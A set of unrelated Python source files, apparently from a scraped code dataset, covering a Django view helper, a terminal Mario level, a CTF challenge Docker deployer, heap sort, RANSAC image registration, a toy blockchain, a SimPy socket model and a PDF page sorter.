shop/contexts.py
|
lbacon17/lb-fitness
| 0
|
12783472
|
from django.conf import settings
from django.shortcuts import get_object_or_404
from .models import Product
def favourites():
"""This view iterates through the favourites"""
favourite_items = []
shop_items = Product.objects.all()
for item in shop_items:
shop_item = get_object_or_404(Product, pk=item_id)
favourite_items.append(shop_item)
context = {
'favourite_items': favourite_items,
}
return context
| 1.976563
| 2
|
mymario/level1_map.py
|
sriteja777/My_Mario
| 1
|
12783473
|
<filename>mymario/level1_map.py<gh_stars>1-10
"""
A module containing class for level 1 map
"""
from random import randrange
from irregular import print_cloud, IrregularObjects
from map import Map
from motion import MovingBridges, Enemies
from objects import Obj, Extras
import config
from music import Music
msc = Music()
def get_extra():
"""
Returns any random extra point when PLAYER_OBJ touches extra bridges
:return: Returns the string of extra point
"""
num = randrange(0, 3)
if num == 0:
return config.TIME
if num == 1:
return config.LOVE
# x = 2
return config.STONE
class Level1Map(Map):
"""
A class for level 1
"""
def __init__(self, map_id, rows, columns):
"""
Initialises various attributes of level 1
:param columns:
:param rows:
"""
Map.__init__(self, map_id, columns, rows, 5*columns)
self.fishes = []
self.moving_bridges = []
self.sub_holes = []
self.thrones = []
self.clouds = []
self.lake = None
self.stones = []
self.extras = []
self.pole = None
self.lives = []
self.up_wall = None
self.down_wall = None
print(self.length, self.columns, self.rows)
print(config.MAP_LENGTH, config.COLUMNS, config.ROWS)
self.create_walls()
self.create_clouds()
self.create_pole()
self.create_lake_fishes()
self.create_bridges()
self.create_moving_bridges()
self.create_holes()
self.create_coins()
self.create_enemies()
self.create_extras()
self.initial_player_position = {'max_x': 4, 'max_y': self.up_wall.min_y - 1, 'min_x': 3, 'min_y': self.up_wall.min_y - 2}
self.create_checkpoints()
self.player_crossed_start = False
self.player_crossed_lake = False
self.player_crossed_thrones = False
# self.music_conf = [{}]
def control_music(self, player_loc):
if not self.player_crossed_start and \
player_loc > self.holes[2].max_x:
self.player_crossed_start = True
msc.play_music_for_action('Player at lake', change=True)
if not self.player_crossed_lake and player_loc > self.lake.max_x:
self.player_crossed_lake = True
msc.play_music_for_action('Player at thrones', change=True)
if not self.player_crossed_thrones and \
player_loc > self.thrones[0].max_x:
self.player_crossed_thrones = True
msc.play_music_for_action('Player at end', change=True)
def create_checkpoints(self):
"""
Dependencies: initial player position, walls, holes, lakes
:return:
"""
self.checkpoints.append((self.initial_player_position['min_x'], self.initial_player_position['max_y']))
self.checkpoints.append((self.columns, self.up_wall.min_y - 1))
self.checkpoints.append((self.holes[1].max_x + 4, self.up_wall.min_y - 1))
self.checkpoints.append((self.holes[2].max_x + 4, self.up_wall.min_y - 1))
self.checkpoints.append((self.lake.max_x + 1, self.up_wall.min_y - 1))
def create_enemies(self):
"""
Dependencies: Holes, bridges, lakes, walls
"""
self.enemies.append(Enemies(self.sub_holes[0].max_x - 2, self.sub_holes[0].max_y,
self.sub_holes[0].max_x - 3,
self.sub_holes[0].max_y - 1, config.ENEMY,
self.sub_holes[0].min_x,
self.sub_holes[0].max_x - 2, self))
self.enemies.append(
Enemies(self.holes[1].min_x - 1, self.up_wall.min_y - 1, self.holes[1].min_x - 2,
self.up_wall.min_y - 2,
config.ENEMY, self.bridges[2].max_x + 1, self.holes[1].min_x - 1, self))
self.enemies.append(
Enemies(self.bridges[3].max_x, self.bridges[3].min_y - 1, self.bridges[3].max_x - 1,
self.bridges[3].min_y - 2, config.ENEMY, self.bridges[3].min_x,
self.bridges[3].max_x, self))
# Create enemies and bridges on lake
mid = int((self.lake.min_x + self.lake.max_x) / 2)
print(self.lake.min_y, self.lake.max_y)
# print('x_pos -> ', c.LAKES[0].min_x + 5, mid, 10)
# print('y_pos-> ', c.LAKES[0].min_y - 5, c.TOP - 3, int(c.ROWS / 10))
# sleep(3)
min_y = int(config.TOP + self.rows / 10)
for x_pos, y_pos in zip(range(self.lake.min_x + 5, mid, 10),
range(self.lake.min_y - 5, min_y, -int(self.rows / 10))):
self.bridges.append(Obj(x_pos + 3, y_pos, x_pos - 3, y_pos - 1, config.BRIDGE, self.map_array, self.object_array))
rand_x = randrange(x_pos - 3, x_pos + 3)
self.enemies.append(
Enemies(rand_x + 1, y_pos - 2, rand_x, y_pos - 3, config.ENEMY, x_pos - 3, x_pos + 3, self))
store = self.bridges[-1]
self.enemies[-1].kill()
self.enemies.append(Enemies(store.max_x, store.min_y - 1, store.max_x - 1,
store.min_y - 2, config.ENEMY, store.max_x - 1, store.max_x, self))
for x_pos, y_pos in zip(range(self.lake.max_x - 5, mid, -10),
range(self.lake.min_y - 5, min_y, -int(self.rows / 10))):
self.bridges.append(Obj(x_pos + 3, y_pos, x_pos - 3, y_pos - 1, config.BRIDGE, self.map_array, self.object_array))
rand_x = randrange(x_pos - 3, x_pos + 3)
self.enemies.append(
Enemies(rand_x + 1, y_pos - 2, rand_x, y_pos - 3, config.ENEMY, x_pos - 3, x_pos + 3, self))
store_2 = self.bridges[-1]
self.bridges.append(Obj(store_2.min_x, store.max_y, store.max_x, store.min_y, config.BRIDGE, self.map_array, self.object_array))
self.enemies[-1].kill()
self.enemies.append(Enemies(store_2.min_x + 1, store_2.min_y - 1, store_2.min_x,
store_2.min_y - 2, config.ENEMY, store_2.min_x, store_2.min_x + 1, self))
mid = int((store.max_x + store_2.min_x) / 2)
self.lives.append(Obj(mid, config.TOP, mid, config.TOP, config.LOVE, self.map_array, self.object_array))
def create_coins(self):
# Dependencies: Bridges, walls, holes
mid = int((self.bridges[0].min_x + self.bridges[0].max_x) / 2)
self.coins.append(
Obj(mid, self.bridges[0].min_y - 1, mid, self.bridges[0].min_y - 1, config.COIN, self.map_array, self.object_array))
mid = int((self.bridges[1].min_x + self.bridges[1].max_x) / 2)
for x_pos, y_pos in zip(range(mid - 4, mid + 2, 2),
range(self.bridges[1].min_y - 1, self.bridges[1].min_y - 4, -1)):
self.coins.append(Obj(x_pos, y_pos, x_pos, y_pos, config.COIN, self.map_array, self.object_array))
for x_pos, y_pos in zip(range(mid + 2, mid + 8, 2),
range(self.bridges[1].min_y - 2, self.bridges[1].min_y, 1)):
self.coins.append(Obj(x_pos, y_pos, x_pos, y_pos, config.COIN, self.map_array, self.object_array))
self.coins.append(Obj(self.sub_holes[0].max_x, self.sub_holes[0].max_y, self.sub_holes[0].max_x, self.sub_holes[0].max_y, config.TIME, self.map_array, self.object_array))
for x_pos in range(self.holes[0].max_x + 5, self.bridges[2].min_x - 5, 3):
self.coins.append(Obj(x_pos, self.up_wall.min_y - 1, x_pos, self.up_wall.min_y - 1, config.COIN, self.map_array, self.object_array))
def create_holes(self):
# Dependencies: walls, bridges
rand_x = randrange(int(self.columns / 3), int((2 * self.columns) / 3))
self.holes.append(Obj(rand_x + 5, self.down_wall.max_y - 2, rand_x, self.up_wall.min_y, ' ', self.map_array, self.object_array))
self.sub_holes.append(Obj(self.holes[0].max_x + 10, self.holes[0].max_y, self.holes[0].min_x, self.up_wall.min_y + 2, ' ', self.map_array, self.object_array))
rand_x = randrange(int((4 * self.columns) / 3) + 4, int(5 * self.columns / 3) - 4)
self.holes.append(Obj(rand_x + 4, self.rows, rand_x - 4, self.up_wall.min_y, ' ', self.map_array, self.object_array))
self.holes.append(Obj(self.bridges[5].max_x + 24, self.rows, self.bridges[5].max_x + 1, self.up_wall.min_y, ' ', self.map_array, self.object_array))
def create_extras(self):
# Dependencies: bridges
mid = int((self.bridges[1].min_x + self.bridges[1].max_x) / 2)
self.extras.append(
Extras(mid + 1, self.bridges[1].max_y, mid - 1, self.bridges[1].min_y,
config.EXTRAS_BRIDGE,
get_extra(), self.map_array, self.object_array))
mid = int((self.bridges[3].min_x + self.bridges[3].max_x) / 2)
self.extras.append(
Extras(mid + 1, self.bridges[3].max_y, mid - 1, self.bridges[3].min_y,
config.EXTRAS_BRIDGE,
get_extra(), self.map_array, self.object_array))
def create_bridges(self):
# Dependencies: walls
self.bridges.append(Obj(20, self.up_wall.min_y - 5, 14, self.up_wall.min_y - 7, config.BRIDGE, self.map_array, self.object_array))
self.bridges.append(Obj(40, self.up_wall.min_y - 5, 25, self.up_wall.min_y - 7, config.BRIDGE, self.map_array, self.object_array))
self.bridges.append(Obj(self.columns - 4, self.up_wall.min_y - 1, self.columns - 10, self.up_wall.min_y - 7, config.BRIDGE, self.map_array, self.object_array))
rand_x = randrange(self.columns + 5, int(4 * self.columns / 3) - 5)
self.bridges.append(Obj(5 + rand_x, self.up_wall.min_y - 5, rand_x - 5, self.up_wall.min_y - 8, config.BRIDGE, self.map_array, self.object_array))
rand_x = randrange(int(5 * self.columns / 3) + 1, 2 * self.columns - 2)
self.bridges.append(Obj(rand_x + 1, self.up_wall.min_y - 6, rand_x - 1, self.up_wall.min_y - 8, config.BRIDGE, self.map_array, self.object_array))
rand_x = randrange(2 * self.columns + 6, int((7 * self.columns) / 3) - 6)
cross_bridge_list = [[' ' for _ in range(0, 15)] for _ in range(0, 15)]
for x_pos in range(0, 15):
for y_pos in range(15 - x_pos, 15):
cross_bridge_list[x_pos][y_pos] = config.BRIDGE
self.bridges.append(IrregularObjects({'max_x': rand_x + 6, 'max_y': self.up_wall.min_y - 1, 'min_x': rand_x - 6,'min_y': self.up_wall.min_y - 14}, cross_bridge_list, self.map_array, self.object_array))
def create_lake_fishes(self):
# Dependencies: walls
min_x = int(8 * self.columns / 3)
max_x = int(11 * self.columns / 3)
self.lake = Obj(max_x, self.down_wall.max_y - 1, min_x, self.up_wall.max_y, config.WATER, self.map_array, self.object_array)
rand_x = randrange(self.lake.min_x + 2, self.lake.max_x - 2)
rand_y = self.lake.min_y + randrange(1, 4)
self.fishes.append(Obj(rand_x, rand_y, rand_x, rand_y, config.FISH, self.map_array, self.object_array))
rand_x = randrange(self.lake.min_x + 2, self.lake.max_x - 2)
rand_y = self.lake.min_y + randrange(1, 4)
self.fishes.append(Obj(rand_x, rand_y, rand_x, rand_y, config.FISH, self.map_array, self.object_array))
def create_moving_bridges(self):
# Dependencies: walls, lake
min_x = int((11 * self.columns) / 3) + 7
length = 15
max_x = int((9 * self.columns) / 2)
# Create Knifes
self.thrones.append(Obj(max_x, self.up_wall.max_y + 1, min_x, self.up_wall.max_y, config.THRONES, self.map_array, self.object_array))
min_y = config.TOP + 5
max_y = self.lake.min_y - 5
for x_pos in range(min_x, max_x, 25):
rand_y = randrange(min_y, max_y + 1)
self.moving_bridges.append(
MovingBridges(x_pos + length, rand_y, x_pos, rand_y,
config.MOVING_BRIDGES, config.TOP + 5, self.lake.min_y - 5, self))
def create_walls(self):
# Dependencies: None
self.down_wall = Obj(self.length, self.rows, 1, int((9 * self.rows) / 10), config.DOWN_WALL, self.map_array, self.object_array)
self.up_wall = Obj(self.length, self.down_wall.min_y - 1, 1, self.down_wall.min_y - 1, config.UP_WALL, self.map_array, self.object_array)
def create_clouds(self):
# Dependencies: None
cloud = print_cloud()
rand_x = randrange(1, self.columns)
rand_x_2 = randrange(self.columns, 2 * self.columns)
rand_x_3 = randrange(2 * self.columns, 3 * self.columns)
self.clouds.append(IrregularObjects(
{'max_x': len(cloud[0]) + rand_x, 'max_y': 5 + len(cloud), 'min_x': rand_x, 'min_y': 1},
cloud, self.map_array, self.object_array))
self.clouds.append(IrregularObjects(
{'max_x': len(cloud[0]) + rand_x_2, 'max_y': 4 + len(cloud), 'min_x': rand_x_2,
'min_y': 2},
cloud, self.map_array, self.object_array))
self.clouds.append(IrregularObjects(
{'max_x': len(cloud[0]) + rand_x_3, 'max_y': 6 + len(cloud), 'min_x': rand_x_3,
'min_y': 1},
cloud, self.map_array, self.object_array))
def create_pole(self):
# Dependencies: Walls
self.pole = Obj(self.length - 5, self.up_wall.min_y - 1, self.length - 5, self.up_wall.min_y - 15, '|', self.map_array, self.object_array)
def get_features(self):
"""
Get Features of map
:return:
"""
# Override to print a readable string presentation of your object
# below is a dynamic way of doing this without explicity constructing the string manually
return ', '.join(
['{key}={value}'.format(key=key, value=self.__dict__.get(key)) for key in
self.__dict__]
)
if __name__ == '__main__':
TED = Level1Map(1, 2, 10)
print(TED.get_features())
| 3.40625
| 3
|
serve.py
|
racterub/ctfdeployer
| 3
|
12783474
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @Date : 2019-05-31 00:14:27
# @Author : Racter (<EMAIL>)
# @Profile : https://racterub.me
import yaml
from argparse import ArgumentParser
import os
import sys
import shutil
from subprocess import check_output
def parseParam():
parser = ArgumentParser()
parser.add_argument("-d", "--dir", help="Path to challenges", default="chal/", dest="path")
parser.add_argument("-p", "--port", help="Pwn challenges' starting port (Default => 6000)", type=int, default=6000, dest="port")
parser.add_argument("-i", "--img", help="Docker base image for your pwn challenges (Default => ubuntu:18.04) or do just do <img>:<tag>", default="ubuntu:18.04", dest="image")
parser.add_argument("-t", "--timeout", help="Set timeout limit", default=0, dest="time")
parser.add_argument("-g", "--gen-conf", help="Generate docker-compose.yml", action="store_true", dest="gen_conf")
parser.add_argument("-e", "--ex-libc", help="Export libc from container", action="store_true", dest="ex_libc")
args = parser.parse_args()
return args
def genConf(path, port, image, timeout):
config = {"services": {}}
base = os.path.dirname(os.path.abspath(__file__)) + "/%s" % path
chal = [f for f in os.listdir(base)]
for i in range(len(chal)):
baseDir = base + chal[i]
data = {"build": "chal/%s" % chal[i], "ulimits": {"nproc": 1024}, "ports": ["%d:9999" % port]}
config['services'][chal[i]] = data
port += 1
with open('docker-compose.yml', 'w') as f:
f.write(yaml.dump({"version": '3'}) + yaml.dump(config))
def exportLibc(path, port, image, timeout):
base = os.path.dirname(os.path.abspath(__file__)) + "/%s" % path
chal = [f for f in os.listdir(base)]
os.mkdir('libc/')
for i in range(len(chal)):
os.mkdir("libc/%s" % chal[i])
containerID = check_output('docker ps -aqf "name=pwndeployer_%s"' % chal[i], shell=True).strip().decode()
os.system("docker cp --follow-link %s:lib32/libc.so.6 libc/%s/lib32" % (containerID, chal[i]))
os.system("docker cp --follow-link %s:lib/x86_64-linux-gnu/libc.so.6 libc/%s/lib64" % (containerID, chal[i]))
def setup(path, port, image, timeout):
config = {"services": {}}
base = os.path.dirname(os.path.abspath(__file__)) + "/%s" % path
chal = [f for f in os.listdir(base)]
for i in range(len(chal)):
baseDir = base + chal[i]
os.mkdir(baseDir+"/bin/")
dockerfile = """FROM %s
RUN apt-get update && apt-get -y dist-upgrade
RUN apt-get install -y lib32z1 xinetd
RUN useradd -m ctf
COPY ./bin/ /home/ctf/
COPY ./ctf.xinetd /etc/xinetd.d/ctf
COPY ./start.sh /start.sh
RUN echo "Blocked by ctf_xinetd" > /etc/banner_fail
RUN chmod +x /start.sh
RUN chown -R root:ctf /home/ctf
RUN chmod -R 750 /home/ctf
RUN chmod 740 /home/ctf/flag
RUN cp -R /lib* /home/ctf
RUN cp -R /usr/lib* /home/ctf
RUN mkdir /home/ctf/dev
RUN mknod /home/ctf/dev/null c 1 3
RUN mknod /home/ctf/dev/zero c 1 5
RUN mknod /home/ctf/dev/random c 1 8
RUN mknod /home/ctf/dev/urandom c 1 9
RUN chmod 666 /home/ctf/dev/*
RUN mkdir /home/ctf/bin
RUN cp /bin/sh /home/ctf/bin
RUN cp /bin/ls /home/ctf/bin
RUN cp /bin/cat /home/ctf/bin
RUN cp /usr/bin/timeout /home/ctf/bin
WORKDIR /home/ctf
CMD ["/start.sh"]
EXPOSE 9999
""" % image
with open('xinetd_setting', 'r') as setting:
ctfXinetd = setting.read()
if timeout:
runsh = '''#!/bin/sh
exec 2>/dev/null
timeout %d ./%s''' % (timeout, chal[i])
else:
runsh = '''
#!/bin/sh
exec 2>/dev/null
./%s''' % chal[i]
shutil.move(baseDir+"/%s" % chal[i], baseDir+'/bin/')
shutil.move(baseDir+"/flag", baseDir+'/bin/')
os.chmod(baseDir+'/bin/%s' % chal[i], 0o755)
with open('start.sh') as f:
startsh = f.read()
with open(baseDir+'/start.sh', 'w') as f:
f.write(startsh)
with open(baseDir+'/Dockerfile', 'w') as f:
f.write(dockerfile)
with open(baseDir+'/bin/run.sh', 'w') as f:
f.write(runsh)
with open(baseDir+'/ctf.xinetd', 'w') as f:
f.write(ctfXinetd)
data = {"build": "chal/%s" % chal[i], "ulimits": {"nproc": 1024}, "ports": ["%d:9999" % port]}
config['services'][chal[i]] = data
port += 1
with open('docker-compose.yml', 'w') as f:
f.write(yaml.dump({"version": '3'}) + yaml.dump(config))
if __name__ == "__main__":
arg = parseParam()
if os.path.isdir(arg.path):
if arg.gen_conf:
genConf(arg.path, arg.port, arg.image, arg.time)
elif arg.ex_libc:
exportLibc(arg.path, arg.port, arg.image, arg.time)
else:
setup(arg.path, arg.port, arg.image, arg.time)
else:
print("Invalid input")
sys.exit(-1)
| 2.21875
| 2
|
sort-algorithm/heap_sort.py
|
free-free/Algorithm
| 7
|
12783475
|
<filename>sort-algorithm/heap_sort.py
# -*- coding:utf-8 -*-
import numpy as np
class MaxHeap(object):
def __init__(self, sz, data):
self.sz = sz
self.cnt = len(data)
self.heap = [0] * (self.sz + 1)
self.heap[1 : self.cnt] = data
self.build_heap()
def build_heap(self):
last_no_leaf = self.cnt // 2
for i in range(last_no_leaf, 0, -1):
self.heaplify(self.heap, self.cnt, i)
def heaplify(self, heap, cnt, ind):
while True:
max_pos = ind
if 2 * ind <= cnt and heap[2 * ind] > heap[max_pos]:
max_pos = 2 * ind
if (2 * ind + 1) <= cnt and heap[2 * ind + 1] > heap[max_pos]:
max_pos = 2 * ind + 1
if max_pos == ind:
break
heap[max_pos], heap[ind] = heap[ind], heap[max_pos]
ind = max_pos
def remove_max(self):
if self.cnt == 0:
return -1
max_val = self.heap[1]
self.heap[1] = self.heap[self.cnt]
self.heap[self.cnt] = 0
self.cnt -= 1
self.heaplify(self.heap, self.cnt, 1)
return max_val
def insert(self, item):
if self.cnt >= self.sz:
return -1
self.cnt += 1
self.heap[self.cnt] = item
i = self.cnt
while (i // 2) > 0 and self.heap[i // 2] < self.heap[i]:
self.heap[i // 2], self.heap[i] = self.heap[i], self.heap[i // 2]
i = i // 2
def heap_sort(data):
heap = MaxHeap(len(data), data)
k = heap.cnt
while k >= 1:
heap.heap[1], heap.heap[k] = heap.heap[k], heap.heap[1]
k -= 1
heap.heaplify(heap.heap, k, 1)
return heap.heap[1 : heap.cnt]
if __name__ == '__main__':
data = np.random.randint(0, 100, 10)
print(data)
print(heap_sort(data))
# heap = MaxHeap(20, data)
# print(heap.heap)
# print(heap.remove_max())
# print(heap.heap)
# heap.insert(1000)
# print(heap.heap)
| 3.84375
| 4
|
ransac.py
|
vishwa91/pyimreg
| 63
|
12783476
|
<gh_stars>10-100
#!/usr/bin/env python
from scipy import *
from scipy.linalg import *
from scipy.special import *
from random import choice
from PIL import Image
import sys
from sift import *
from homography import *
import pdb
# New version coming soon.
def get_points(locs1, locs2, matchscores):
'''
Return the corresponding points in both the images
'''
plist = []
t = min(len(locs1), len(locs2))
for i in range(len(matchscores)):
if (matchscores[i] > 0):
y1 = int(locs1[i, 1])
x1 = int(locs1[i, 0])
y2 = int(locs2[int(matchscores[i]), 1])
x2 = int(locs2[int(matchscores[i]), 0])
plist.append([[x1,y1],[x2,y2]])
return plist
def get_homography(points_list):
'''
Function to quickly compute a homography matrix from all point
correspondences.
Inputs:
points_list: tuple of tuple of tuple of correspondence indices. Each
entry is [[x1, y1], [x2, y2]] where [x1, y1] from image 1 corresponds
to [x2, y2] from image 2.
Outputs:
H: Homography matrix.
'''
fp = ones((len(plist), 3))
tp = ones((len(plist), 3))
for idx in range(len(plist)):
fp[idx, 0] = plist[idx][0][0]
fp[idx, 1] = plist[idx][0][1]
tp[idx, 0] = plist[idx][1][0]
tp[idx, 1] = plist[idx][1][1]
H = Haffine_from_points(fp.T, tp.T)
return H
def ransac(im1, im2, points_list, iters = 10 , error = 10, good_model_num = 5):
'''
This function uses RANSAC algorithm to estimate the
shift and rotation between the two given images
'''
if ndim(im1) == 2:
rows,cols = im1.shape
else:
rows, cols, _ = im1.shape
model_error = 255
model_H = None
for i in range(iters):
consensus_set = []
points_list_temp = copy(points_list).tolist()
# Randomly select 3 points
for j in range(3):
temp = choice(points_list_temp)
consensus_set.append(temp)
points_list_temp.remove(temp)
# Calculate the homography matrix from the 3 points
fp0 = []
fp1 = []
fp2 = []
tp0 = []
tp1 = []
tp2 = []
for line in consensus_set:
fp0.append(line[0][0])
fp1.append(line[0][1])
fp2.append(1)
tp0.append(line[1][0])
tp1.append(line[1][1])
tp2.append(1)
fp = array([fp0, fp1, fp2])
tp = array([tp0, tp1, tp2])
H = Haffine_from_points(fp, tp)
# Transform the second image
# imtemp = transform_im(im2, [-xshift, -yshift], -theta)
# Check if the other points fit this model
for p in points_list_temp:
x1, y1 = p[0]
x2, y2 = p[1]
A = array([x1, y1, 1]).reshape(3,1)
B = array([x2, y2, 1]).reshape(3,1)
out = B - dot(H, A)
dist_err = hypot(out[0][0], out[1][0])
if dist_err < error:
consensus_set.append(p)
# Check how well is our speculated model
if len(consensus_set) >= good_model_num:
dists = []
for p in consensus_set:
x0, y0 = p[0]
x1, y1 = p[1]
A = array([x0, y0, 1]).reshape(3,1)
B = array([x1, y1, 1]).reshape(3,1)
out = B - dot(H, A)
dist_err = hypot(out[0][0], out[1][0])
dists.append(dist_err)
if (max(dists) < error) and (max(dists) < model_error):
model_error = max(dists)
model_H = H
return model_H
if __name__ == "__main__":
try:
os.mkdir("temp")
except OSError:
pass
try:
# Load images from command prompt
im1 = Image.open(sys.argv[1])
im2 = Image.open(sys.argv[2])
except IndexError:
print('Usage: python ransac.py image1 image2')
sys.exit()
im1.convert('L').save('temp/1.pgm')
im2.convert('L').save('temp/2.pgm')
im1 = asarray(im1)
im2 = asarray(im2)
process_image('temp/1.pgm', 'temp/1.key')
process_image('temp/2.pgm', 'temp/2.key')
key1 = read_features_from_file('temp/1.key')
key2 = read_features_from_file('temp/2.key')
score = match(key1[1], key2[1])
plist = get_points(key1[0], key2[0], score)
plot_matches(im1,im2,key1[0],key2[0],score)
# Compare ransac and simple homography matrix
out_ransac = ransac(im1, im2, plist)
out_simple = get_homography(plist)
H_ransac = inv(out_ransac)
H_simple = inv(out_simple)
im_ransac = affine_transform2(im1,
H_ransac[:2, :2],
[H_ransac[0][2], H_ransac[1][2]])
im_simple = affine_transform2(im1,
H_simple[:2, :2],
[H_simple[0][2], H_simple[1][2]])
Image.fromarray(im2).show()
Image.fromarray(im_ransac).show()
Image.fromarray(im_simple).show()
| 2.6875
| 3
|
modules/blockchain/blockchain.py
|
zeddo123/OpenBook
| 12
|
12783477
|
import copy as cp
from pprint import pprint as pp
from termcolor import colored
from modules.blockchain.block import *
from modules.blockchain.book import *
from modules.blockchain.transaction import *
class BlockChain:
"""BlockChain Object to be added to the chain
:Attributes:
:attr block_chain: All the blocks in the chain
:type block_chain: list
:attr open_transaction: All the transactions to be added
:type open_transaction: list
:Methods:
:meth __init__: Constructor of the class
:meth to_json: Create a json file of the block-chain
:meth valid_proof: Verify the hash guess
:meth proof_of_work: Calculate the hash of the block and return nonce
:meth create_append_transaction: Create and append a transaction to the open transaction list
:meth mine_block: mine the new block + add the reward transaction
:meth number_blocks: gives number of block in the chain
:meth __str__: magic method, prints the chain and its blocks
"""
def __init__(self, override=False, debug=True):
"""Constructor of the class"""
# Create the genesis block (the first block in the chain)
if not override:
genesis_block = Block(None,
[Transaction(sender=None, recipient='BlockChain', book=None, transaction_type=2)])
self.block_chain = [genesis_block]
else:
genesis_block = None
self.block_chain = []
# a list containing all the forks of a chain at the same level
self.chains_same_level = [self.block_chain]
self.open_transactions = []
self.debug = debug
def valid_proof(self, last_hash, nonce):
"""Verify the hash guess
:param last_hash: the hash of the previous block in the chain
:type last_hash: str
:param nonce: nonce guess of the hash
:type nonce: int
:returns: True or False guess_hash
:rtype: bool
"""
guess = (str(list(map(str, self.open_transactions))) + str(last_hash) + str(nonce)).encode()
guess_hash = hashlib.sha256(guess).hexdigest()
# print(guess_hash)
return guess_hash[0:2] == '42' # 42 is the difficulty to find the hash
def proof_of_work(self):
"""Search for the right hash by adjusting the `nonce` value
:var nonce: field whose value is adjusted by miners so that the hash of
the block will be the current target (for now it's 42 as the first two chars) of the network
:type nonce: int
:returns: nonce of the hash
:rtype: int
"""
last_block = self.block_chain[-1]
last_hash = last_block.hash
nonce = 0
while not self.valid_proof(last_hash, nonce):
nonce += 1
return nonce
# TODO: change the name of this method
def create_append_transaction(self, new_transaction):
"""This method create a transaction and append it to the Open transaction attr
:param new_transaction: new transaction
:type new_transaction: Transaction object -> *`modules.blockchain.transaction`*
:returns: None
"""
if self.verify_transaction(new_transaction):
self.open_transactions.append(new_transaction)
def verify_transaction(self, new_transaction): # TODO: complete this method
pass
@staticmethod
def verify_blockchain(blockchain, flag_list=False):
"""Verify if a block-chain hasn't been tampered with
loop through the block and verify the difference between the hashes
:param blockchain: the block-chain to be verified
:type blockchain: BlockChain *-blockchain.py*
:returns: the chain is valid or not
:rtype: {bool}
"""
if not flag_list:
block_chain = blockchain.block_chain
else:
block_chain = blockchain
flags = []
for i in range(1, len(block_chain)):
block = block_chain[i]
block1 = block_chain[i - 1]
if block.hash != block.hash_block():
flags.append("[!] Found difference between the hash and the calculated one")
elif block1.hash != block.previous_hash:
flags.append("[!] Found difference between the hash of a block and the one previous")
elif block1.timestamp >= block.timestamp:
flags.append("[!] Found irregularity between the time-stamps")
if not flag_list:
blockchain._debug(flags)
return True if len(flags) == 0 else False
def mine_block(self, recipient):
"""This method mine the new block with the opentransaction list
:param recipient: Miner's ID - who is being rewarded for mining the block
:type recipient: str
:returns: None
"""
last_block = self.block_chain[-1] # Get the Last block
last_hash = last_block.hash # Get the hash of the last block
nonce = self.proof_of_work() # Determine the nonce value
# Create the reward and append it to the open transactions
reward_transaction = Transaction(sender=None, recipient=recipient, book=None, transaction_type=2)
self.open_transactions.append(reward_transaction)
# Create the new Block
new_block = Block(last_hash, self.open_transactions, index=len(self.block_chain), nonce=nonce)
self.block_chain.append(new_block)
self.open_transactions = []
def fork_chain(self, index=None):
"""Create a fork *-copy* of the block-chain with index*- beginning* preferred
The copy is made by a deep-copy
:param index: the start of the *forking*, defaults to None
:type index: int, optional
"""
copy = cp.deepcopy(self)
copy.block_chain = copy.block_chain[index:]
return copy
def to_json(self):
"""
to_json converts the object into a json object
:var dict_json: contains information about the blocks
:type dict_json: dict
:returns: a dict (json) containing the chain
:rtype: dict
"""
dict_json = {}
# Loop through and convert the block to json objects
for i, block in enumerate(self.block_chain):
dict_json[i] = block.to_json()
return dict_json
# Returs number of block in the chain
number_blocks = lambda self: len(self.block_chain)
def __eq__(self, other):
return self.to_json() == other.to_json()
def __repr__(self):
return str(self.to_json())
def __str__(self):
print(f'::{self.number_blocks()} blocks in the blockchain')
for block, number in zip(self.block_chain, range(len(self.block_chain))):
print('number\n', number)
print('block\n', block)
return ''
@staticmethod
def json_to_blockchain(bc_json):
bc = BlockChain(override=True)
for block in bc_json.values():
bc.block_chain.append(Block.json_to_block(block))
return bc
def _debug(self, msg, pprint=False):
"""Prints helpful information in debug mode
_debug print with different color depending on the node_type
:param msg: the message to display
:type msg: string
:param pprint: prints a msg with a pprint *with indentation*, defaults to False
:type pprint: bool, optional
"""
if self.debug:
if not pprint:
print(colored(msg, 'magenta'))
else:
pp(msg, indent=4, width=4)
if __name__ == '__main__':
# Exemple on how to use the blockchain object
blockchain = BlockChain()
print(blockchain)
blockchain.create_append_transaction(Transaction('mouha', 'recipient',
Book(title='The Selfish Gene', author='<NAME>',
date='19--', genre='Science')))
blockchain.mine_block('zeddo')
print(blockchain)
| 3.3125
| 3
|
Fabric_socket.py
|
sgino209/Traffic_Simulation
| 0
|
12783478
|
<reponame>sgino209/Traffic_Simulation
__author__ = 'shahargino'
import simpy
class Fabric_socket:
"""This class implements the socket core of the Fabric"""
# ----------------------------------------------------------------------------------------
def __init__(self, name, params, parent, tb):
self.name = self.__class__.__name__ + "_" + name
self.env = tb['ENV']
self.params = params
self.parent = parent
self.clk_ns = parent.clk_ns
self.granted = True
if self.params['INIT_TGT'] == 'initiator':
self.granted = False
self.debug = tb['AUX'].debug
self.error = tb['AUX'].error
self.action = self.env.process(self.run())
for key, value in self.params.iteritems():
self.debug(self.name, 'Created with %s = %s' % (key, value))
# ----------------------------------------------------------------------------------------
def is_initiator(self):
return self.params['INIT_TGT'] == 'initiator'
# ----------------------------------------------------------------------------------------
def set_grant(self, val):
if not self.granted and val:
self.debug(self.name, '"%s" has been granted by Fabric Arbiter' % self.name)
self.granted = val
# ----------------------------------------------------------------------------------------
def run(self):
while True:
try:
yield self.env.timeout(self.clk_ns)
if self.params['INIT_TGT'] == 'initiator' and self.granted:
self.parent.action.interrupt(
["SOCKET_GRANTED", self.name[len(self.__class__.__name__ + "_"):]]
)
except simpy.Interrupt as interrupt:
int_cause = interrupt.cause
if int_cause[0] == 'MESSAGE_FOR_TARGET':
if self.is_initiator():
self.error(self.name, 'An Initiator socket cannot receive Target messages')
else:
self.parent.action.interrupt(int_cause)
| 2.359375
| 2
|
scanpdf/sort.py
|
mjirik/scanpdf
| 0
|
12783479
|
<filename>scanpdf/sort.py
# /usr/bin/env python
# -*- coding: utf-8 -*-
import logging
logger = logging.getLogger(__name__)
# conda create -c conda-forge -n -c mcs07 scanpdf python=3.6 numpy scikit-image jupyter tesseract
import sys
import glob
import os.path as op
import os
import shutil
import numpy as np
from matplotlib import pyplot as plt
import scipy.misc
import skimage.transform
import skimage.io
import scanpdf.deskew
def make_output_dir(path):
head, teil = op.split(path)
output_path = op.join(head, teil + " - sorted")
if not op.exists(output_path):
import os
os.makedirs(output_path)
return output_path
def sort_prepare_parameters(path, reverse_odd_pages=False, reverse_even_pages=True, turn_odd_pages=False, turn_even_pages=True):
fns = glob.glob(op.join(path, "*"))
